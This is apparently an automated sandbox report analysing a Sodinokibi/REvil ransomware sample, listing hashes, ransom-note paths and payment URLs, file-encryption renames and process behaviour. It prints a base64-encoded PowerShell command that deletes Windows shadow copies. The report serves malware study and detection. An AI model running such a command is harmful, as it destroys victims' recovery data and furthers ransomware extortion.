Analysis
-
max time kernel
147s -
max time network
6s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
01-08-2020 09:48
Static task
static1
Behavioral task
behavioral1
Sample
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
Resource
win7v200722
Behavioral task
behavioral2
Sample
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
Resource
win10
General
-
Target
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
-
Size
116KB
-
MD5
90e6ea15ed18005b431e135186d57abf
-
SHA1
d8e126cd0f5f3f214989c3533fd22c7291c44174
-
SHA256
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d
-
SHA512
91690e64b9d39b2b1c0fb7575d75d632f5fbe1dd6c36b935ea2fde1e7bbbfc0e68ba50d73919f4cb2502d7e2b46fe98a3ddcb217b3cb1da77fc290e86031c60d
Malware Config
Extracted
C:\g99p63b-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E976AC921A981160
http://decryptor.cc/E976AC921A981160
Signatures
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bik0t446i89.bmp" bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe -
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exedescription ioc process File renamed C:\Users\Admin\Pictures\CompleteRedo.png => \??\c:\users\admin\pictures\CompleteRedo.png.g99p63b bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File renamed C:\Users\Admin\Pictures\CompressNew.raw => \??\c:\users\admin\pictures\CompressNew.raw.g99p63b bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File renamed C:\Users\Admin\Pictures\DenyApprove.png => \??\c:\users\admin\pictures\DenyApprove.png.g99p63b bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File renamed C:\Users\Admin\Pictures\InstallUnblock.crw => \??\c:\users\admin\pictures\InstallUnblock.crw.g99p63b bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File renamed C:\Users\Admin\Pictures\SetResize.raw => \??\c:\users\admin\pictures\SetResize.raw.g99p63b bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File renamed C:\Users\Admin\Pictures\UninstallConnect.tif => \??\c:\users\admin\pictures\UninstallConnect.tif.g99p63b bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File renamed C:\Users\Admin\Pictures\UseRedo.tif => \??\c:\users\admin\pictures\UseRedo.tif.g99p63b bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1620 bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe Token: SeDebugPrivilege 384 powershell.exe Token: SeBackupPrivilege 1908 vssvc.exe Token: SeRestorePrivilege 1908 vssvc.exe Token: SeAuditPrivilege 1908 vssvc.exe Token: SeTakeOwnershipPrivilege 1620 bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exepowershell.exepid process 1620 bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe 384 powershell.exe 384 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exedescription pid process target process PID 1620 wrote to memory of 384 1620 bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe powershell.exe PID 1620 wrote to memory of 384 1620 bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe powershell.exe PID 1620 wrote to memory of 384 1620 bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe powershell.exe PID 1620 wrote to memory of 384 1620 bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe powershell.exe -
Drops file in Program Files directory 35 IoCs
Processes:
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exedescription ioc process File opened for modification \??\c:\program files\InvokeNew.midi bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File created \??\c:\program files\microsoft sql server compact edition\g99p63b-readme.txt bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\SplitHide.gif bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\UninstallResolve.mpeg3 bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\g99p63b-readme.txt bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\g99p63b-readme.txt bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\InstallPop.ttf bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\StopUnpublish.docx bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\SwitchImport.ppsm bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\GroupCheckpoint.vdx bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\OutClose.mov bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\ReadConvertFrom.zip bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\RedoComplete.ex_ bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\UndoTest.au3 bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File created \??\c:\program files\g99p63b-readme.txt bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\ConfirmRead.xht bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\ConvertToJoin.wvx bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\GrantComplete.xlsx bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\InitializeProtect.eps bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\MergeFind.wma bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\MoveSelect.edrwx bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\OpenHide.vdx bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\PopRegister.clr bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File created \??\c:\program files (x86)\g99p63b-readme.txt bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\FindReset.wmx bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\RepairPop.docx bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\ImportInstall.vsdm bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\ResolveConvertFrom.xlsx bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\RevokeStep.docx bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\TraceCheckpoint.mp2 bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\ConvertCompare.mp2 bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\ConvertToInitialize.mpe bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\RevokeResize.dotx bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\ConvertToUpdate.vdw bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\UnregisterInitialize.dotm bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe"C:\Users\Admin\AppData\Local\Temp\bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe"1⤵
- Sets desktop wallpaper using registry
- Modifies extensions of user files
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/384-0-0x0000000000000000-mapping.dmp